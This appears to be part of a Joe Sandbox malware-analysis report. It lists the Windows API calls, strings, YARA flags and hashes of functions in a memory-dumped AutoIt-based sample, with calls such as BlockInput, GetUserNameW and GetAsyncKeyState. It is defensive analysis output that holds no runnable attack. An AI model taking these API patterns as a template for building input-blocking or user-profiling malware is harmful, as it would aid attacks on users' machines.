                                        • Opcode Fuzzy Hash: 925dac118e8909a44153c6949165c584659becb63e0e4485281a20e35b55b2c9
                                        • Instruction Fuzzy Hash: B8F055363002065BCB15AF3AC81866BBFA0EFC1720B0A405EEB098F361C6329842C790
                                        APIs
                                        • BlockInput.USER32(00000001), ref: 00C643D4
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: BlockInput
                                        • String ID:
                                        • API String ID: 3456056419-0
                                        • Opcode ID: 04aa5396366ddc1e3eba8463ae14a6b7aca21d91dc445aedf2757ba2b24839a0
                                        • Instruction ID: 4eef767c965901037b032eeca651585da55a45a8eaf5e9b8813bafb3da7b35d3
                                        • Opcode Fuzzy Hash: 04aa5396366ddc1e3eba8463ae14a6b7aca21d91dc445aedf2757ba2b24839a0
                                        • Instruction Fuzzy Hash: FBE04F352002099FD720AF6AE845A9BF7E8AF94760F008466FE49D7761DBB0EC558B90
                                        APIs
                                        • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,014EB342,?,20001004,00000000,00000002,?,?,014EA934), ref: 014EC873
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: InfoLocale
                                        • String ID:
                                        • API String ID: 2299586839-0
                                        • Opcode ID: d052cd3b7e61a5e731a2e9570b6eb0af7e1756294e79fa6b369f8027f102e654
                                        • Instruction ID: f91c6e275f2d39f297613e1be9f58a8f138b88c92cc807b76becac3da25a7c64
                                        • Opcode Fuzzy Hash: d052cd3b7e61a5e731a2e9570b6eb0af7e1756294e79fa6b369f8027f102e654
                                        • Instruction Fuzzy Hash: B1E04F31540218BBCF126F66ED48AAE7F56FF54762F054426FD1565224CB328921EBD0
                                        APIs
                                        • GetUserNameW.ADVAPI32(?,?), ref: 00C30664
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: NameUser
                                        • String ID:
                                        • API String ID: 2645101109-0
                                        • Opcode ID: 7f5debf8cda8af34d6d9749bb972bb47ff6eee6d4b118027a22609699ba39a0c
                                        • Instruction ID: 62ae16a336bae133ed0985d034e784b86f527b7b86531cdabbb92d1e6dfcafa2
                                        • Opcode Fuzzy Hash: 7f5debf8cda8af34d6d9749bb972bb47ff6eee6d4b118027a22609699ba39a0c
                                        • Instruction Fuzzy Hash: 8EC04CF180011DDBCB05DB90DA98EEE77BCAB05305F20006AA101F2100D7749B448B71
                                        APIs
                                        • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00C1A28A
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled
                                        • String ID:
                                        • API String ID: 3192549508-0
                                        • Opcode ID: 66163616d8c3c4928d0cc13ce8f6f07ae9601b5c3748006c3f59e22766290af5
                                        • Instruction ID: 6acd8712053f13aee00148a8f46f8dfd44a9744307127d45f80bae40816d874b
                                        • Opcode Fuzzy Hash: 66163616d8c3c4928d0cc13ce8f6f07ae9601b5c3748006c3f59e22766290af5
                                        • Instruction Fuzzy Hash: B3A0113002020CAB8A002B82EC08A88BFACEA022A0B008020F80C000328B32A8208A88
                                        APIs
                                        • SetTextColor.GDI32(?,00000000), ref: 00C7AA1D
                                        • GetSysColorBrush.USER32(0000000F), ref: 00C7AA4E
                                        • GetSysColor.USER32(0000000F), ref: 00C7AA5A
                                        • SetBkColor.GDI32(?,000000FF), ref: 00C7AA74
                                        • SelectObject.GDI32(?,00000000), ref: 00C7AA83
                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 00C7AAAE
                                        • GetSysColor.USER32(00000010), ref: 00C7AAB6
                                        • CreateSolidBrush.GDI32(00000000), ref: 00C7AABD
                                        • FrameRect.USER32(?,?,00000000), ref: 00C7AACC
                                        • DeleteObject.GDI32(00000000), ref: 00C7AAD3
                                        • InflateRect.USER32(?,000000FE,000000FE), ref: 00C7AB1E
                                        • FillRect.USER32(?,?,00000000), ref: 00C7AB50
                                        • GetWindowLongW.USER32(?,000000F0), ref: 00C7AB7B
                                          • Part of subcall function 00C7ACB7: GetSysColor.USER32(00000012), ref: 00C7ACF0
                                          • Part of subcall function 00C7ACB7: SetTextColor.GDI32(?,?), ref: 00C7ACF4
                                          • Part of subcall function 00C7ACB7: GetSysColorBrush.USER32(0000000F), ref: 00C7AD0A
                                          • Part of subcall function 00C7ACB7: GetSysColor.USER32(0000000F), ref: 00C7AD15
                                          • Part of subcall function 00C7ACB7: GetSysColor.USER32(00000011), ref: 00C7AD32
                                          • Part of subcall function 00C7ACB7: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00C7AD40
                                          • Part of subcall function 00C7ACB7: SelectObject.GDI32(?,00000000), ref: 00C7AD51
                                          • Part of subcall function 00C7ACB7: SetBkColor.GDI32(?,00000000), ref: 00C7AD5A
                                          • Part of subcall function 00C7ACB7: SelectObject.GDI32(?,?), ref: 00C7AD67
                                          • Part of subcall function 00C7ACB7: InflateRect.USER32(?,000000FF,000000FF), ref: 00C7AD86
                                          • Part of subcall function 00C7ACB7: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00C7AD9D
                                          • Part of subcall function 00C7ACB7: GetWindowLongW.USER32(00000000,000000F0), ref: 00C7ADB2
                                          • Part of subcall function 00C7ACB7: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00C7ADDA
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                        • String ID:
                                        • API String ID: 3521893082-0
                                        • Opcode ID: 5929c4f8858aa6809ce7a025d1885cac88d98c9d2cfcff248ba6c64037c77c1c
                                        • Instruction ID: cc240368a9af05135307ef7a22f47e0e35e8c9e66b1bdeab929d910a29d6d4e5
                                        • Opcode Fuzzy Hash: 5929c4f8858aa6809ce7a025d1885cac88d98c9d2cfcff248ba6c64037c77c1c
                                        • Instruction Fuzzy Hash: E9918A72008301AFC7919F64DC08B6FBBA9FF89331F204A19F9A6961A0D771D948DF56
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: __wcsnicmp$Exception@8Throwstd::exception::exception
                                        • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                        • API String ID: 2660009612-1645009161
                                        • Opcode ID: bd4c9b6c3a2711214e11640b028c609957186add0001fe3273159382eb254b44
                                        • Instruction ID: a3b6f39dbf14596d9ef43f52584d8d47b37cfb3ceb1c162f29e16007bbbcd712
                                        • Opcode Fuzzy Hash: bd4c9b6c3a2711214e11640b028c609957186add0001fe3273159382eb254b44
                                        • Instruction Fuzzy Hash: 57A1C031A04209BBCB24BF61CC46EBE77B4AF45704F144129F815AB2D2EBB09F52EB50
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 014C90C9
                                        • std::_Lockit::_Lockit.LIBCPMT ref: 014C90D3
                                          • Part of subcall function 01402420: std::_Lockit::_Lockit.LIBCPMT ref: 0140243D
                                          • Part of subcall function 01402420: std::_Lockit::~_Lockit.LIBCPMT ref: 01402459
                                        • numpunct.LIBCPMT ref: 014C910D
                                        • std::_Facet_Register.LIBCPMT ref: 014C9124
                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 014C9144
                                        • Concurrency::cancel_current_task.LIBCPMT ref: 014C9151
                                        • __EH_prolog3.LIBCMT ref: 014C915E
                                        • std::_Lockit::_Lockit.LIBCPMT ref: 014C9168
                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 014C91D9
                                          • Part of subcall function 014CA5FE: __EH_prolog3.LIBCMT ref: 014CA605
                                          • Part of subcall function 014CA5FE: numpunct.LIBCPMT ref: 014CA64B
                                        • std::_Facet_Register.LIBCPMT ref: 014C91B9
                                          • Part of subcall function 014CA66A: __EH_prolog3.LIBCMT ref: 014CA671
                                          • Part of subcall function 014CA66A: numpunct.LIBCPMT ref: 014CA6B7
                                        • Concurrency::cancel_current_task.LIBCPMT ref: 014C91E6
                                        • __EH_prolog3.LIBCMT ref: 014C91F3
                                        • std::_Lockit::_Lockit.LIBCPMT ref: 014C91FD
                                        • std::_Facet_Register.LIBCPMT ref: 014C924E
                                          • Part of subcall function 014CA6D6: __EH_prolog3.LIBCMT ref: 014CA6DD
                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 014C926E
                                        • Concurrency::cancel_current_task.LIBCPMT ref: 014C927B
                                        • __EH_prolog3.LIBCMT ref: 014C9288
                                        • std::_Lockit::_Lockit.LIBCPMT ref: 014C9292
                                        • std::_Facet_Register.LIBCPMT ref: 014C92E3
                                          • Part of subcall function 014CA74A: __EH_prolog3.LIBCMT ref: 014CA751
                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 014C9303
                                        • Concurrency::cancel_current_task.LIBCPMT ref: 014C9310
                                        • __EH_prolog3.LIBCMT ref: 014C931D
                                        • std::_Lockit::_Lockit.LIBCPMT ref: 014C9327
                                        • std::_Facet_Register.LIBCPMT ref: 014C9378
                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 014C9398
                                        • Concurrency::cancel_current_task.LIBCPMT ref: 014C93A5
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: std::_$Lockit$H_prolog3$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register$numpunct
                                        • String ID:
                                        • API String ID: 2212333951-0
                                        • Opcode ID: 8ceb60c1790a7a4bf4ac22b7922ea36d9bbcae9ace0b13f41599390f1f109de5
                                        • Instruction ID: 2dacb290b82c4a17d698b7e65242dbea23c55e9535a911f60cf53ad2c1529080
                                        • Opcode Fuzzy Hash: 8ceb60c1790a7a4bf4ac22b7922ea36d9bbcae9ace0b13f41599390f1f109de5
                                        • Instruction Fuzzy Hash: 8F91137A900116ABCF15EFA5C454AAEB7B1BFB4B24F15440EE414AB3E0DF70DA04CB91
                                        APIs
                                        • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00C54809
                                        • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00C5482F
                                        • _wcscpy.LIBCMT ref: 00C5485D
                                        • _wcscmp.LIBCMT ref: 00C54868
                                        • _wcscat.LIBCMT ref: 00C5487E
                                        • _wcsstr.LIBCMT ref: 00C54889
                                        • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00C548A5
                                        • _wcscat.LIBCMT ref: 00C548EE
                                        • _wcscat.LIBCMT ref: 00C548F5
                                        • _wcsncpy.LIBCMT ref: 00C54920
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                        • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                        • API String ID: 699586101-1459072770
                                        • Opcode ID: b996eca0422e9dbc5127cd366c8b61835b3a67874810654511b9c7ac6df3e574
                                        • Instruction ID: 018bbb9ae31e037f1f54a3b9292a589cb3e75a072dc800bf888dd51412522af1
                                        • Opcode Fuzzy Hash: b996eca0422e9dbc5127cd366c8b61835b3a67874810654511b9c7ac6df3e574
                                        • Instruction Fuzzy Hash: DA411775A002047BE714B7648C47EFF376CEF42315F100066F904A6192EB709AD2B7A9
                                        APIs
                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00BF2C8C
                                        • GetSystemMetrics.USER32(00000007), ref: 00BF2C94
                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00BF2CBF
                                        • GetSystemMetrics.USER32(00000008), ref: 00BF2CC7
                                        • GetSystemMetrics.USER32(00000004), ref: 00BF2CEC
                                        • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00BF2D09
                                        • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00BF2D19
                                        • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00BF2D4C
                                        • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00BF2D60
                                        • GetClientRect.USER32(00000000,000000FF), ref: 00BF2D7E
                                        • GetStockObject.GDI32(00000011), ref: 00BF2D9A
                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 00BF2DA5
                                          • Part of subcall function 00BF2714: GetCursorPos.USER32(?), ref: 00BF2727
                                          • Part of subcall function 00BF2714: ScreenToClient.USER32(00CB67B0,?), ref: 00BF2744
                                          • Part of subcall function 00BF2714: GetAsyncKeyState.USER32(?), ref: 00BF2769
                                          • Part of subcall function 00BF2714: GetAsyncKeyState.USER32(?), ref: 00BF2777
                                        • SetTimer.USER32(00000000,00000000,00000028,00BF1473), ref: 00BF2DCC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                        • String ID: AutoIt v3 GUI
                                        • API String ID: 1458621304-248962490
                                        • Opcode ID: 308303f3fa46d16a7ead63a2577870a806e9aec4e717c7ea86836f341df1b524
                                        • Instruction ID: e31418ef71051b62e1714a3d8247fa1bebb7bd423b49e1b0835fdabc2e9a59e2
                                        • Opcode Fuzzy Hash: 308303f3fa46d16a7ead63a2577870a806e9aec4e717c7ea86836f341df1b524
                                        • Instruction Fuzzy Hash: DBB16D71A0020A9FDB14DFA8DC85BAD7BF4FB08314F204669FA15A72A0DB74A954CF64
                                        APIs
                                          • Part of subcall function 00C01821: _memmove.LIBCMT ref: 00C0185B
                                        • GetForegroundWindow.USER32(00C80980,?,?,?,?,?), ref: 00C1040E
                                        • IsWindow.USER32(?), ref: 00C464A0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: Window$Foreground_memmove
                                        • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                        • API String ID: 3828923867-1919597938
                                        • Opcode ID: 357c451f586d70234b237facb80210cdc43f804ec73fcdc369e7246628c0a887
                                        • Instruction ID: 413e5e7f020d565f4f5ec9a2bf273248f6e41d67ad069ed86c9698a4c8dc98f0
                                        • Opcode Fuzzy Hash: 357c451f586d70234b237facb80210cdc43f804ec73fcdc369e7246628c0a887
                                        • Instruction Fuzzy Hash: 75D1F8701046029BCF04EF20C4919AAFBB5BF56344F504A1DF4A6835A6DB70EE99EF93
                                        APIs
                                        • CharUpperBuffW.USER32(?,?), ref: 00C74274
                                        • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00C74334
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: BuffCharMessageSendUpper
                                        • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                        • API String ID: 3974292440-719923060
                                        • Opcode ID: fd7b6a2636fb4028ee5110dbdba5cc02859a366aa1d914bd43aaa568422a02bc
                                        • Instruction ID: 858177c835e70b80afc00d115f66c3416b08ec9670bd089d635fd250db136003
                                        • Opcode Fuzzy Hash: fd7b6a2636fb4028ee5110dbdba5cc02859a366aa1d914bd43aaa568422a02bc
                                        • Instruction Fuzzy Hash: BFA182702142019FCB18EF20C851B7AB3E5FF85314F108968B96A9B3D2DB70ED49DB52
                                        APIs
                                        • LoadIconW.USER32(00000063), ref: 00C4C98D
                                        • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00C4C99F
                                        • SetWindowTextW.USER32(?,?), ref: 00C4C9B6
                                        • GetDlgItem.USER32(?,000003EA), ref: 00C4C9CB
                                        • SetWindowTextW.USER32(00000000,?), ref: 00C4C9D1
                                        • GetDlgItem.USER32(?,000003E9), ref: 00C4C9E1
                                        • SetWindowTextW.USER32(00000000,?), ref: 00C4C9E7
                                        • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00C4CA08
                                        • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00C4CA22
                                        • GetWindowRect.USER32(?,?), ref: 00C4CA2B
                                        • SetWindowTextW.USER32(?,?), ref: 00C4CA96
                                        • GetDesktopWindow.USER32 ref: 00C4CA9C
                                        • GetWindowRect.USER32(00000000), ref: 00C4CAA3
                                        • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00C4CAEF
                                        • GetClientRect.USER32(?,?), ref: 00C4CAFC
                                        • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00C4CB21
                                        • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00C4CB4C
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                        • String ID:
                                        • API String ID: 3869813825-0
                                        • Opcode ID: b08be3eab11128ef8cfe9348818455ee4f13484ec4d3b790de02345443af16f4
                                        • Instruction ID: 3d00c300ef8ae80334275ffcc8e8acc9fae90623bc57e15cbc1280eb264598ff
                                        • Opcode Fuzzy Hash: b08be3eab11128ef8cfe9348818455ee4f13484ec4d3b790de02345443af16f4
                                        • Instruction Fuzzy Hash: B8518C31A00709EFDB60DFA8CD89B6EBBF5FF04705F100928E596A25A0D774A914DB44
                                        APIs
                                        • _memset.LIBCMT ref: 00C7A646
                                        • DestroyWindow.USER32(00000000,?), ref: 00C7A6C0
                                          • Part of subcall function 00C01821: _memmove.LIBCMT ref: 00C0185B
                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00C7A73A
                                        • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00C7A75C
                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00C7A76F
                                        • DestroyWindow.USER32(00000000), ref: 00C7A791
                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,?,00000000), ref: 00C7A7C8
                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00C7A7E1
                                        • GetDesktopWindow.USER32 ref: 00C7A7FA
                                        • GetWindowRect.USER32(00000000), ref: 00C7A801
                                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00C7A819
                                        • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00C7A831
                                          • Part of subcall function 00BF29AB: GetWindowLongW.USER32(?,000000EB), ref: 00BF29BC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                        • String ID: 0$tooltips_class32
                                        • API String ID: 1297703922-3619404913
                                        • Opcode ID: b06dfd24d01673cb455aa25c3976093a947830cc81622e2c95a52f57104dc72c
                                        • Instruction ID: 67bfcb9306228ff6fd4254e500ebe1bb7b636119b6b4911483337b48971fc27e
                                        • Opcode Fuzzy Hash: b06dfd24d01673cb455aa25c3976093a947830cc81622e2c95a52f57104dc72c
                                        • Instruction Fuzzy Hash: 0871A871140201AFE725CF28CC48F6E7BE9FB88304F18861CF999872A1D775EA06DB56
                                        APIs
